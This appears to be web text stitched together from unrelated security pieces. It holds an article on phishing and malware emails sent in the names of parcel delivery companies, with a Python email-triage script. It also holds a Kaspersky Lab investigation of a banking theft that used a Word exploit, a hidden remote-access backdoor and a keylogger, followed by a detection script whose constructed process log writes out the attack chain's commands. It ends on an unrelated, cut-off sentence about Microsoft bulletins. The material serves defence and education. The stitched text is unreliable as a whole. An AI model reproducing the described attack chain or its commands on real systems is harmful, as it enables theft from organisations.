Well-known companies and brands are favorite targets for fraudsters. After all, it is much easier to get people's attention with the use of a popular name, so scammers have more chance of trapping a gullible user.
In this article, we will analyze phishing and malicious emails sent by fraudsters on behalf of international delivery services. The most popular of these are DHL (Germany), FedEx and United Parcel Service (USA), TNT (Netherlands). All of these companies are international, with millions of customers using branches in major countries all over the world. They provide similar services, so scammers use the same methods and techniques in their fraudulent mails.
The phishers' goals include:
- Theft of confidential data (bank card credentials, logins and passwords for personal accounts), mainly with the help of fake web pages imitating the official pages of a company's site. In a phishing attack, users provide the fraudsters with their personal data by filling in the fields on fake sites or sending them via email.
- Installing various malicious programs on users' computers. These programs are used not only to monitor user online activity and steal personal information, but also to organize botnets to distribute spam and launch DDoS attacks.
Structurally, the address in the From field looks like this: Sender Name <mailbox@domain>. To confuse recipients, scammers can change parts of the address and often make it look very similar to an official address of the delivery service.
There are several groups of email addresses seen in fraudulent emails:
- Email addresses which closely resemble companies' legitimate public addresses. Generally, they use the name of the company (DHL INC, TNT COURIER SERVICE, Fedex, etc.) as the sender name. The name of the mailbox often includes the words info, service, noreply, mail, support which are typical of email addresses used to send official notifications. The server domain name often has a real or very plausible company domain.
- Addresses which do not resemble legitimate company addresses. The sender name still reflects the company name (FedEx, DHL Service, FedEx.com) but the domain name usually belongs to a free email service or an absolutely different company. The email address could be taken from a real user (taken from public sources or hacked mailboxes) or automatically generated addresses. The latter usually appear as a random sequence of letters, words and numbers.
- Addresses that resemble e-mail addresses of company employees. The sender name may contain the name and surname of a supposed employee, or the company name, or a position (courier, manager, etc). The name of the email box usually contains the same name and surname as the sender name because any difference in the data may alert the recipient to a fraudulent email. Either the real company domain or other domains not related to delivery companies might be used as a domain name.
- Addresses which only indicate the sender's address without a name.
While analyzing the sender address, remember that scammers do not need to hack the company's servers to use the real company domain in the From field. They can simply insert the domain name they need into the From field.
The Subject field
The subject of the fraudulent mail should capture the imagination of recipients and encourage them to open the message, but it also needs to be plausible. Therefore spammers choose common phrases typical of official notifications from delivery services. After sending a parcel or a document, customers worry about its successful delivery and try to follow its progress by reading any notification from a delivery service.
The most popular subjects are:
- Subjects related to the delivery/shipment (shipment notifications, delivery status, shipping confirmation, shipment documents, delivery information, etc.).
- Subjects related to tracking shipments, order information and invoices (the tracking number of the shipment, tracking the shipment, etc.).
- Subjects related to notifications about messages and accounts (creation and confirmation of accounts, new messages, etc.).
Scammers pay special attention to the design of the email. Their main goal is to make the message as believable as possible. After all, if it looks suspicious, a potential victim will most likely delete it despite the attractive subject and plausible sender address. Let's analyze the basic techniques that fraudsters use to make emails look legitimate.
Graphic design
All major international companies have their own corporate style, including wordmarks, graphic trademarks, corporate fonts, slogans and color schemes. These are used on the official website, in mailings and commercials, and in other design components. Scammers use at least some of these elements when designing fraudulent emails to make them look convincing. Usually phishers focus on logos because these elements are unique to each company and are an immediate identifying mark.
Examples of DHL company logos used in fraudulent emails.
Let's take a closer look at these examples. It's immediately obvious that the second example is very different from the company's official logo. Another sign of a forgery is the difference in size between the false logo and the original, as seen in the fourth example where the logo takes almost a third of the message. Here the plan is probably to attract the reader's attention with a large bright picture rather than plain text. That also explains why the phishing links appear in a larger font: users should respond to it immediately, without trying to read the small print.
In the first example, the scammers are trying to copy the design from the official site (a very popular method). However, the logo is placed on the right-hand side rather than on the left. Also, they are using a color blend for the logo background rather than making it single-color. The logo in the third example most closely imitates the original DHL logo: the scammers have tried to match its size and design. It's not really all that difficult to make a logo for a fake notification: there are plenty of versions of the original image available online in several formats, including vector graphics. In addition to the logo, the fraudsters use the color spectrum chosen by the company in its official resources and mailings. For example, for DHL it is a combination of yellow and red.
The text design
In most official emails we find a number of set phrases, especially when it comes to standard notifications generated and sent automatically. These messages often include contacts and links to the official resources of the sender. Therefore, to make the text of the fake email look like an original notification from a delivery service the fraudsters use:
- Standard phrases typical of official mass mailings: Please do not reply to this email, This is automatically generated email, please do not reply, All rights reserved, Diese Versendung ist automatisch, Bitte beantworten Sie diese nicht, This communication contains proprietary information and may be confidential. Questo e' un email automatico, Si prega di non rispondere, etc.
- Links to the official page of the company. Not all links contained in a fraudulent email are phishing links: spammers may also use links which really lead to the official resources in order to make their emails look legitimate and bypass spam filtering.
- Contact for feedback. The fraudsters often indicate the contact information of the sender or the company (name, surname, position, office address). These contacts might be real or fictitious.
When fraudsters send out fake emails, convincing readers that it is a real message is only part of the battle. The next step is to persuade the potential victim to do what the scammer requires, such as providing personal information or installing a malicious file. This is where psychology comes into play, and the email content is the main tool.
Fraudulent notifications allegedly sent on behalf of delivery services often use the following tricks:
- Notifications of various problems (e.g. unsuccessful delivery, lack of information, wrong address, no recipient at the delivery address). These phrases are usually related to the delivery since the companies in question are in the service sector. Therefore, a logistics company warning of a problem with a delivery doesn't prompt any suspicion, especially if the email contains some details of the situation.
- A demand to do something or face some consequence. For example, "collect your parcel within 5 days otherwise it will be returned to the sender".
- Phrases about the content of an attachment or link (invoices, detailed information, documents).
- Phrases about the need to do something (follow a link, open an attachment, print out a file, etc.).
The scammers use deadlines like this to make recipients react immediately. The phishers hope that users will be so worried about losing the parcel or paying extra costs that they won't hesitate to provide personal details or open a suspicious attachment.
Users are unlikely to open unknown attachments or follow unknown links. That's why scammers imitate official websites and present malware as a document with information about a parcel. In addition, if the text of the notification states that the attachment contains, for example, a consignment document, the malicious archive will have a similar name, such as "consignment.zip". This applies to phishing links as well: scammers name their links with an appropriate phrase from the text, such as "shipping information".
This simple trick is intended to reassure recipients that the attachment or link is perfectly legitimate.
Assuming the fraudsters have convinced the recipients that the email is real, the next step is to tell the victims how to solve their problems. Fulfilling these instructions is the ultimate goal of the fraudulent email. Here it is important for the scammers not just to tell recipients what they need to do, but to make them understand correctly what is written in the message. To avoid any misunderstanding on the part of the recipients, messages often contain detailed instructions about what to do.
Cheating the user is not the only thing scammers have to do. They also need to bypass spam filters and deliver the email to the email boxes of potential victims. One of the most popular and long-used methods to bypass filtering is to change text fragments within the email. Modern programs designed to send out spam messages include ample opportunities to generate multiple changes in the text. The text of a message which varies from email to email makes the email unique, while different personal information specified within one mailing (such as the number of the shipment, the form of the address, the dates) helps to convince recipients that the email is intended for them. In addition, the fraudsters can send out emails designed in the same style for several months - they only need to change some elements in the text.
Fraudulent notifications from delivery services can change:
- The information about the order/shipment, including the tracking number of the shipment, delivery dates, etc.
- Contact details, sender names and company names. Some mass mailings provide an e-mail address or a phone number of a company representative for feedback. This particular data changes from email to email. In addition, names of company representatives and even company names themselves may also vary.
- The name of the attachment. This mainly refers to malicious attachments whose names vary between messages within one mass mailing, while the different names hide one and the same malicious program.
- Links. In phishing emails and emails with malicious attachments scammers often specifically change the addresses of the links, masking them with the help of different URL shorteners. Most of these links are quickly blocked by current antivirus programs.
- Phrases indicating numbers and dates. These can refer to timetables (days, hours), sums of money and dates (day and month)
- The greeting. Here spammers generally use the email address and/or the name of the recipient. Sometimes they use generic expressions (Dear client, Dear customer, etc.) instead.
- Other text fragments. Some words are replaced with other phrases that have a similar meaning so the general sense of the sentence remains unchanged.
Let's analyze some examples of changes in the text of fraudulent emails.
Below are some emails from yet another mass mailing.
Fake pages
To steal personal information from users, scammers create phishing HTML pages which partially or completely copy the official website of a company. If victims of fraud enter their personal information (bank details, usernames and passwords) on this page, that data immediately falls into the fraudsters' hands.
To mask the links leading to phishing websites the fraudsters often use popular free URL shorteners. In addition, most such services offer customers statistics on the short link, which tell the fraudsters how many times each link was clicked. Phishing pages can be located on specially registered domains, which usually have a short life span, as well as on compromised domains whose owner may not even be aware that the web site is being used for fraudulent purposes.
Let's analyze a fake email sent on behalf of FedEx in which recipients are asked to update their account information. The text of the email contains a link to the official website of the company while the real address to which the user is redirected is nothing like the legitimate page and is located on a free URL shortener service. This becomes obvious when you hover on the link.
After clicking the link, users get to a fraudulent page imitating the official website of FedEx, where they are asked to enter their logins and passwords to access their accounts. Once the users fill in the fields and click "Login", the entered information is transmitted to the scammers who can then access the victims' personal accounts. The menu tabs and other links on the phishing page are often inactive, so clicking on them will not take users to the appropriate page. However, in some cases, phishers imitate all links on the page so that users do not have any doubt about its legitimacy. Sometimes the design of the page imitates the official site but does not copy it completely. If you have a closer look at the details, you will see some differences between the designs of the real and the fake pages. However, most users do not pay attention to small details and this carelessness helps the scammers to steal personal information.
Below is yet another example of an email sent on behalf of FedEx. This time it contains a malicious link. The email informs recipients that delivery is impossible because of missing information. And now users have to follow the specified link for verification.
The link leads to a fraudulent page where potential victims are invited to download a program that will supposedly check whether they are really going to receive a parcel. Naturally, the program turns out to be the well-known Zeus Trojan, which helps the fraudsters to access the computer and all the personal information on it.
Scammers might not only include a phishing link in the body of the email, but also attach an HTML phishing page designed to steal personal data. However, this use of HTML attachments as phishing pages is unusual for fraudulent mailings sent on behalf of delivery services.
Fraudulent emails in different languages
To increase the audience of recipients and customers, spammers are mastering new languages. In addition to traditional English and German, current spam traffic includes emails in Hebrew, Albanian and other languages which were found in advertising and fraudulent mailings a few years ago. For example, you may come across fake notifications from international delivery services written in Italian and Dutch. These emails do not have any special features that distinguish them from English- or German-language messages - to cheat users, the fraudsters resort to the same tricks.
For example, this Italian-language fake notification from FedEx tells users to confirm their identity by following a fraudulent link.
Yet another mass mailing in Italian contained a malicious archive which included the Zeus/Zbot Trojan used to steal personal data. The fraudulent email claimed that the user profiles on the website had been updated and there was more detailed information about it in the archive.
Another fake notification written in Dutch on behalf of TNT informs recipients that new accounts have been formed for them, with details in the attachment. The archive attached to the email contains Backdoor.Win32.Andromeda, a malicious file that allows the scammers to control the infected computer without the user knowing.
Malware in fraudulent emails
Spam is one of the most popular ways of spreading malware and infecting computers on the Internet. Attackers have various tricks to make victims install malicious software on their computers. Email traffic includes a variety of private emails, such as wedding invitations, dating offers and other similar messages. However, fake notifications from well-known companies and brands providing different services remain the most popular cybercriminal trick. International delivery services are also used by spammers as a cover for malicious spam.
Malware spread in fake notifications from delivery services is divided into:
- Trojan programs developed to perform unauthorized operations in order to delete, block, modify or copy data, or to disrupt computer or network performance. Trojans distributed in spam include Backdoors, Trojan-Downloaders, Trojan-Proxies, Trojan-PSWs, Trojan-Spies, Trojan-Bankers and others.
- Worms, malicious programs capable of unauthorized self-proliferation on computers or computer networks. Those copies go on to spread themselves further.
What is dangerous about malicious programs?
- They can steal usernames and passwords from users' accounts, as well as financial or other information sought by the attackers.
- They can create botnets for distributing spam, DDoS attacks and other criminal activity.
- They can provide fraudsters with control over victim computers, including the ability to run, delete or install any files or programs.
Current malicious programs integrate broad-ranging fraudulent functionality. In addition, some malicious programs can download other malware, providing additional opportunities. These might include stealing usernames and passwords entered in the browser or seizing remote control over the whole computer.
Malicious objects in fraudulent notifications can be embedded directly in the email or downloaded from a link provided in the body of the message. The most dangerous thing about it is that malware can be run and installed without users being aware or installing any software themselves. Typically, malicious ZIP (less often RAR) files enclosed in fraudulent emails contain an executable with an .exe extension.
How to recognize phishing emails
Below are a number of features that can help to identify a fraudulent email.
- The sender address. If the sender address includes a random sequence of letters, words or numbers, or the domain has no connection with the official address of the company, the emails should undoubtedly be considered fraudulent and deleted without opening.
- Grammar and spelling mistakes. Wrong word order, incorrect punctuation, grammar and spelling mistakes can also be a sign of a fraudulent mailing.
- Graphic design. Scammers are doing their best to make the email look very similar to the original. To this end they try to imitate other companies' corporate styles using some of their elements, such as color schemes and logos. Inaccuracies and noticeable design errors are among the signs of a fake email.
- The content of the email. If the recipient of the email is asked under various pretexts to urgently provide or confirm personal information, download a file or a link – especially while being threatened with sanctions for not doing so – the email may well be fraudulent.
- Links with different addresses. If the address of the link specified in the body of the email and address of the actual link to which you are redirected do not match, you are definitely looking at a fraudulent email. If you are viewing your email from the browser, the actual link can be usually seen in the bottom left of the browser window. If you use an email client, the actual link can be displayed in a popup window if you hover the cursor over the link in the text. Fraudulent links can also be attached to a text phrase in the email.
- Attached archives. Generally, ZIP and RAR archives are used by cybercriminals to hide malicious executable EXE-files. Therefore, you should not open these archives or run the attached files.
- Lack of contacts for feedback. Legitimate emails always provide contact information for feedback - either the company or the sender's personal contacts.
- Form of address. Fraudulent emails do not necessarily use the first name or the surname to address the recipient; sometimes a universal form of address ("client", etc.) is used.
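Several of the features listed above (sender address, link text versus the real target, archived executables, a generic greeting) can be checked mechanically. The script below is an added example in Python, not code from the original article: the brand and free-mail domain lists are illustrative assumptions, the sample message is constructed, and a From domain that matches the real company proves nothing by itself, since that field can be forged.

```python
import io
import re
import zipfile
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import urlparse

# Assumed reference data (illustrative, not exhaustive): the brands discussed
# above with their real domains, and a few free mail providers.
BRAND_DOMAINS = {"dhl": {"dhl.com", "dhl.de"}, "fedex": {"fedex.com"},
                 "ups": {"ups.com"}, "tnt": {"tnt.com"}}
FREE_MAIL = {"gmail.com", "yahoo.com", "hotmail.com", "outlook.com"}
EXEC_EXT = (".exe", ".scr", ".com", ".cmd", ".bat")
GENERIC_GREETING = re.compile(r"\bdear\s+(client|customer|user|member)\b", re.I)
# Demo-grade anchor extraction; use an HTML parser for production mail.
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]*)"[^>]*>(.*?)</a>', re.I | re.S)


def reg_domain(host):
    """Crude registrable domain (last two labels); enough for this demo."""
    return ".".join((host or "").lower().split(".")[-2:])


def _text(part):
    return part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")


def check_sender(msg):
    """A brand named in the display name or mailbox, but mail sent from elsewhere."""
    name, addr = parseaddr(msg.get("From", ""))
    local, _, host = addr.partition("@")
    dom = reg_domain(host)
    brand = next((b for b in BRAND_DOMAINS if b in f"{name} {local}".lower()), None)
    if brand and dom not in BRAND_DOMAINS[brand]:
        kind = "free mail service" if dom in FREE_MAIL else "unrelated domain"
        return [f"sender: claims {brand.upper()} but mailbox is on {kind} {dom}"]
    return []


def check_links(msg):
    """Visible URL text whose domain differs from the href it actually opens."""
    out = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for href, text in ANCHOR.findall(_text(part)):
            text = re.sub(r"<[^>]+>", "", text)  # drop nested tags
            shown = re.search(r"(?:https?://)?([\w.-]+\.[a-z]{2,})", text, re.I)
            target = reg_domain(urlparse(href).hostname)
            if shown and reg_domain(shown.group(1)) != target:
                out.append(f"link: text shows {shown.group(1)} but opens {target}")
    return out


def check_attachments(msg):
    """ZIP/RAR attachments; ZIPs are listed (never extracted) to spot executables."""
    out = []
    for part in msg.walk():
        fn = (part.get_filename() or "").lower()
        if fn.endswith(".rar"):
            out.append(f"attachment: RAR archive {fn}")
        elif fn.endswith(".zip"):
            names = zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))).namelist()
            execs = [n for n in names if n.lower().endswith(EXEC_EXT)]
            out.append(f"attachment: ZIP {fn} holds {execs or 'no executables'}")
    return out


def check_greeting(msg):
    """Generic form of address instead of the recipient's name."""
    for part in msg.walk():
        if part.get_content_maintype() == "text" and GENERIC_GREETING.search(_text(part)):
            return ["greeting: generic form of address"]
    return []


def triage(msg):
    """All findings; an empty list is not proof that the mail is genuine."""
    return check_sender(msg) + check_links(msg) + check_attachments(msg) + check_greeting(msg)


def build_sample():
    """Constructed message modelled on the FedEx example above (not a real capture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("consignment.exe", b"placeholder bytes, not a real binary")
    m = EmailMessage()
    m["From"] = "FedEx Customer Service <fedex.notify@gmail.com>"
    m["Subject"] = "Shipment notification - delivery information"
    m.set_content("Dear customer, please confirm your account information.")
    m.add_alternative('<p>Dear customer,</p><p>Confirm your account: <a href='
                      '"http://short.example/x7q">http://www.fedex.com/account</a></p>',
                      subtype="html")
    m.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                     filename="consignment.zip")
    return m


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding)
```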
More and more companies are asking Kaspersky Lab to carry out detailed investigations of malware-related IT security incidents affecting their business.
In this article, we will describe a typical cybercriminal attack aiming at stealing corporate financial assets from a remote banking system.
Description of the Incident
An organization recently asked Kaspersky Lab to investigate an incident that had occurred in its corporate remote banking system: a bank representative contacted the organization's accounting department and asked for confirmation of a payment worth 3 million rubles (about US$80,000). It transpired that nobody in the organization had ever heard of this payment. The accountant was certain that he did not make that payment; he explained that he was out on his lunch break at the time of the transaction.
The accountant used banking software on his workstation to prepare payment orders and send them to the bank. The logs on this software recorded two suspicious payments to the same address. The first was a relatively small payment of 300,000 rubles. This did not sound any alarm bells, and was processed without a query. The second payment, worth 3 million rubles, alerted the staff at the company's bank.
It was clear that the accountant had not made the payments himself, so the organization suspected a malware attack. But how was that possible? They were using specialized banking software with password protection. They required a special file to access the remote banking system, and the bank itself would check the IP address of the sender of any payment.
Investigation
The main goal of a malware incident investigation is to accurately assess the consequences of the attack, identify every compromised computer and establish exactly how the malware penetrated the victim computer(s). The organization affected can then use this information to effectively mitigate the damage and address weaknesses in its corporate security system to prevent such incidents from happening in the future.
During the investigation, it is also sometimes possible to detect hitherto-unknown malware species and add their signatures to the security databases, protecting other users from their future impact.
In this case an image of the hard disk from the accountant's desktop was provided to Kaspersky Lab's Global Emergency Response Team (GERT) for analysis and investigation.
Remote Access to Desktop
During our first-pass analysis of the accountant's hard drive, we identified a modified version of the legitimate Remote Manipulator System, which enables remote access to the computer. This type of software is often used by accountants and system administrators. However, this program was located in a suspicious directory and had a suspicious name ('C:\windows\dotcom\wmiterm.exe' is an overly "system-related" path, so even an advanced user is unlikely to smell a rat), and it had two modifications to conceal its operation:
- The icon in the Windows Task Bar was hidden,
- The registry key where the program stores its configuration was modified: 'HKLM\SYSTEM\Remote Manipulator System\v4' was changed to 'HKLM\SYSTEM\System\System\Remote\ Windows', which again looks very similar to a system registry key.
These modifications are typical of malware, so we added signatures for this program to Kaspersky Lab's antivirus databases – it is detected as malicious with the verdict 'Backdoor.Win32.RMS'.
While analyzing the operation of Backdoor.Win32.RMS, we discovered that the cybercriminals used it to download another malware program onto the victim computer, 'Backdoor.Win32.Agent'. (This detection was added to Kaspersky Lab products immediately). That backdoor provided remote VNC (Virtual Network Computing) access to the victim computer. Interestingly, the code of this malware program has a lot in common with the 'hVNC' module of the Carberp Trojan. Carberp's source code is available for public access.
So, how did Backdoor.Win32.RMS sneak onto the accountant's desktop?
Infecting a Corporate Desktop
In the Microsoft Outlook database, stored in the file 'outlook.pst' on the hard drive, we found an email containing an attachment named "запрос ИФНС № АС-4-31339.doc" ('Federal Tax Service request no. AC-4-31339.doc'). Kaspersky Lab Anti-Virus detected that Microsoft Office document as malicious with the verdict 'Exploit.MSWord.CVE-2012-0158.'
The cybercriminals used social engineering methods: the email was sent in the name of Russia's Federal Tax Service, called for immediate action, and provided contact details of real Tax Service officers.
"Federal Taxation Service. Please provide all required documents as soon as possible."
The accountant would certainly have opened the attachment, which exploited a vulnerability in Microsoft Word to download a self-unpacking archive from a remote server and then initialize the unpacking. The archive contained two files: 'SYST.EXE', a renamed version of the file archiver '7zip', and 'SYST'.
While unpacking, the source archive launched the archive program 'SYST.EXE' with parameters instructing it to unpack the password-protected archive 'SYST' using the incorporated password. This trick of using a password-protected archive successfully bypasses security software's attempts at static unpacking of the file, impeding its detection.
Unpacking 'SYST' created the following: the 'Backdoor.Win32.RMS' file (which we detected earlier) and the 'INST.CMD' script which installed the backdoor in the system. This is the script that copied the malicious program's files into the folder 'C:\windows\dotcom'.
After we detected the backdoors, we began to understand how the cybercriminals could have stolen the money. With remote access to the computer, they could have made their own payment order, and then the key file and the sender's IP address would both be legitimate. But we still didn't know how the criminals got the password to access the banking software. We decided to look for a keylogger program.
The keylogger
The file 'Svchost.exe' attracted our attention, located in the root of the system disk. It turned out to be a keylogger (detection added with the verdict 'Trojan-Spy.Win32.Delf'); it also contained functionality to manage the configuration of Backdoor.Win32.RMS. This unusual capability was apparently introduced by the cybercriminals because they needed a tool to control the modified Remote Manipulator System: they had hidden this program's entire user interface and could use it to manage the configuration.
We also discovered that this keylogger was downloaded with the help of Backdoor.Win32.RMS.
The keylogger sent a log containing all stolen information to the C&C at regular intervals and kept an up-to-date copy of the log on the infected computer's hard drive. We found the banking password within the piles of information stolen by the keylogger.
The battle plan
Following our research, we reconstructed the cybercriminals' action plan:
- The cybercriminals launched a targeted attack using social engineering and a Microsoft Word vulnerability to infect the accountant's computer with Backdoor.Win32.RMS.
- With the help of that backdoor, the cybercriminals loaded two more malicious programs onto the victim computer: a keylogger (Trojan-Spy.Win32.Delf) and another backdoor (Backdoor.Win32.Agent) which establishes remote VNC access to the victim computer.
- The keylogger intercepted the password to the remote banking account.
- While the accountant was away from his computer, the cybercriminals used Backdoor.Win32.Agent and the VNC access to the computer to start the banking software on behalf of the accountant.
- The cybercriminals used the password intercepted by the keylogger to create a payment order worth 300,000 rubles and send it to the bank.
- A bit later, they created another payment order, this time worth 3 million rubles, and sent it to the bank.
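The chain above maps onto a handful of process-creation checks. The script below is an added example in Python, not part of the original investigation: it runs four rules derived from the artifacts named in the article over a constructed process log, assuming the renamed archiver keeps 7-Zip's command-line syntax and that the exploited document spawned its payload as a child of Word.

```python
import ntpath
import re

# Detection rules derived from the attack chain described above. The log
# format and the events below are constructed for this example; real sources
# (Sysmon event 1, EDR telemetry) carry the same fields under other names.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
ARCHIVERS = {"7z.exe", "7za.exe", "7zr.exe"}            # 7-Zip's own binary names
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
BACKDOOR_DIR = r"c:\windows\dotcom"                     # directory named in the article
SEVEN_ZIP_CMD = re.compile(r"\b[xe]\s+\S+.*\s-p\S*", re.I)  # '<tool> x <archive> -p<pw>'
EXEC_EXT = (".exe", ".cmd", ".bat", ".scr")


def parse_events(text):
    """Pipe-separated constructed log: time|parent image|image|command line."""
    events = []
    for line in text.strip().splitlines():
        t, parent, image, cmd = line.split("|", 3)
        events.append({"time": t, "parent": parent, "image": image, "cmd": cmd})
    return events


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def rules_for(ev):
    """Return the names of every rule a single event matches."""
    hits = []
    img, parent = ev["image"], ev["parent"]
    # Office process spawning an executable/script outside Program Files: the
    # self-extracting archive downloaded by the Word exploit (assumed parent).
    if (_base(parent) in OFFICE_APPS and _base(img).endswith(EXEC_EXT)
            and not _dir(img).startswith(r"c:\program files")):
        hits.append("office_spawns_executable")
    # 7-Zip extraction syntax with a password switch from a binary not named
    # like 7-Zip: the renamed 'SYST.EXE' unpacking the protected 'SYST' archive.
    if SEVEN_ZIP_CMD.search(ev["cmd"]) and _base(img) not in ARCHIVERS:
        hits.append("renamed_archiver_with_password")
    # svchost.exe anywhere but the system directories, like 'C:\Svchost.exe'.
    if _base(img) == "svchost.exe" and _dir(img) not in SYSTEM_DIRS:
        hits.append("svchost_outside_system32")
    # Anything executing from the backdoor's install directory.
    if _dir(img) == BACKDOOR_DIR:
        hits.append("backdoor_directory")
    return hits


def scan(events):
    """Flatten to (time, image, rule) triples for every matching event."""
    return [(ev["time"], ev["image"], r) for ev in events for r in rules_for(ev)]


# Constructed events (not a real capture) following the four-day timeline;
# 'sfx.exe', the user name and the password are placeholders.
SAMPLE_LOG = r"""
day1 09:00|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
day1 09:55|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office14\WINWORD.EXE|WINWORD.EXE /n "request.doc"
day1 09:56|C:\Program Files\Microsoft Office\Office14\WINWORD.EXE|C:\Users\acct\AppData\Local\Temp\sfx.exe|sfx.exe
day1 09:56|C:\Users\acct\AppData\Local\Temp\sfx.exe|C:\Users\acct\AppData\Local\Temp\SYST.EXE|SYST.EXE x SYST -pREDACTED -oC:\Users\acct\AppData\Local\Temp
day1 09:56|C:\Users\acct\AppData\Local\Temp\sfx.exe|C:\Windows\System32\cmd.exe|cmd.exe /c INST.CMD
day1 09:57|C:\Windows\System32\cmd.exe|C:\windows\dotcom\wmiterm.exe|wmiterm.exe
day2 14:10|C:\Windows\explorer.exe|C:\Program Files\7-Zip\7z.exe|7z.exe x backup.zip -psecret
day4 12:40|C:\windows\dotcom\wmiterm.exe|C:\Svchost.exe|Svchost.exe
"""

if __name__ == "__main__":
    for time, image, rule in scan(parse_events(SAMPLE_LOG)):
        print(f"{time}  {rule:32} {image}")
```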
As we got towards the end of the investigation, we discovered yet another interesting fact: the IP addresses of the C&C servers for all malicious programs used in the attack belonged to the same sub-network.
Diagram of the cybercriminal attack
We also found out that the cybercriminals acted very fast: it took them just four days to carry out their planned crime. Three days were spent preparing, and the plan was executed within just a few hours on the fourth day.
Day 1. The cybercriminals sent the email to the company's accountant. The accountant read the email, opened the attachment, and the malicious program Backdoor.Win32.RMS was downloaded to his computer. On the following days, the cybercriminals used this program to watch the accountant's activities.
Day 4. The cybercriminals used Backdoor.Win32.RMS to load the keylogger Trojan-Spy.Win32.Delf onto the victim computer and intercepted the password to the banking software. Soon afterwards they loaded Backdoor.Win32.Agent and used it to connect to the accountant's computer. Then they sent payment orders from the victim computer to the bank.
Notifying the cybercriminals' victims
As the cybercriminals used several IP addresses from the same sub-network, we decided to have a closer look at the C&C servers. As it turned out, the cybercriminals made a mistake when configuring one of the servers, so any user could see the HTTP requests to the C&C servers. That's how we were able to track down the IP addresses from which requests were sent using the keylogger's protocol. As we found out, there were several computers with different IP addresses infected with the keylogger.
There was one odd feature of this keylogger: when it was launched on an infected computer, it downloaded the latest version of its log from the C&C server. Thus, any user could review the keylogger's log by opening the appropriate URL in their web browser. We decided to have a close look at the HTTP requests sent to the C&C server, and in them we found the names of the logs that the keyloggers sent to the C&C server. In many cases, the logs contained the name of the organization which owned the infected computer and the victims' contacts (we could also find the victims' IP addresses using the vulnerability in the C&C server). This information helped us contact other victims (most of them were accountants at SMBs) and warn them that their computers were infected. They were very grateful for the information.
Features of banking attacks
As we said at the beginning of the article, this attack is a typical case of stealing money from a company.
- Cybercriminals actively use social engineering to encourage users to open the malicious file.
- When attacking important targets, cybercriminals may use new exploits for previously unpublished vulnerabilities. In such cases regular attack detection tools, such as IDS, are not good enough.
- Yet another feature of this attack is that it involves legitimate software. This is a growing trend: we see cybercriminals using legitimate applications to gain remote access to victim computers before downloading and launching malicious files on them.
Members of staff who deal with commercially important information and handle the company's finances need training on the basics of IT security. The company must implement security policies that would minimize the risk of employee negligence causing an infection on the corporate network.
However, 0-day exploits are too expensive to use in attacks on regular companies. Here we usually see exploits for known vulnerabilities. This means simple steps like promptly updating software (especially Microsoft Office and Java) and installing a quality security solution can ensure adequate levels of protection.
Security products obviously won't flag up the use of legitimate software. So cybercriminals can use these applications in a bid to keep their operations secret. In this attack, secrecy was ensured by using a version of Remote Manipulator System with modifications introduced into its executable file. We added a signature for this modified version of Remote Manipulator System so in future Kaspersky Lab's products will detect it.
If cybercriminals use the original, unmodified versions of legitimate software, the only solution will be for security systems to notify the user every time a potentially unwanted program is launched. All users, especially those who deal with financial and other important documents, must remember that no security system can provide absolute protection. They should pay attention to system notifications and be alert to any anomalous behavior on their computer. It's important to notify security staff of any suspicious event in the system.
Ideally, default deny mode should be enabled on all computers used to make payments in a remote banking system; this mode restricts Internet access and prevents the launch of irrelevant, non-whitelisted software. The same applies to computers used by corporate users to work with commercially important (business-critical) information.
Conclusion
These days, the main driving force behind all cybercriminal actions is money. Gaining access to remote banking systems is the most direct and straightforward way of stealing money from an organization. It is little surprise that remote banking systems are an increasingly attractive target for cybercriminal attacks.
Anyone who uses remote banking systems is more than familiar with the security systems incorporated in them … but so are the cybercriminals. The use of passwords, key files and tokens, as well as restricting IP access, can lull users into a false sense of security.
However, none of these measures, whether taken individually or as a group, will do anything to enhance security if they are implemented on a compromised computer. On an infected machine, passwords can be intercepted, key files can be copied. Cybercriminals can create a hidden desktop and use the original IP address and the token connected to the victim computer.
When investigating security incidents we regularly encounter the following situation: a malicious program is launched on a computer, but later it is detected and removed from the system. Subsequently the affected computer is used as before, continuing to carry out banking transactions with the accountant confident that the problem has been solved.
Users must realize that once a malicious program is executed, the computer affected should be considered compromised. The first malicious file only loads the main malicious payload. That payload typically consists of programs which update themselves all the time to escape detection by security products. Alternatively, cybercriminals load legitimate software with modifications that enable cybercriminals to connect to it via malicious C&C servers. In this case the malicious programs will not be detected.
Overlooking this can cause huge damage to a company. If a malicious program has been detected on a computer with critical information, incident response measures must be taken immediately.
Sadly, our experience shows that organizations often sound the alarm too late, when they are already facing financial loss or the shutdown of critical computing services. Moreover, the response measures taken within corporations usually prove ineffective, and often impede further investigation.
There is no such thing as a one-size-fits-all response to an incident. There are too many possible attack methods out there. For example, in some cases shutting the computer down immediately helps to preserve data that would be irreversibly deleted by a malicious program after a certain period. In other situations, though, a shutdown will destroy the RAM data that is vital to a subsequent investigation. Only an incident investigation specialist can make the right decision.
In any case, if there is the slightest suspicion of intrusion, any compromised computer should be disconnected from the Internet and the corporate network, and malware incident specialists should be called in.
Only a detailed investigation of a security incident can lead to an effective response.
Microsoft released four security bulletins this month addressing a total of 42 vulnerabilities in Internet Explorer (MS14-052), .NET (MS14-053), the Windows task scheduler (MS14-054), and several issues in Windows Lync Server (MS14-055). I counted a total of 37 CVEs set aside for Internet Explorer, with the remaining five spread across the other three products.
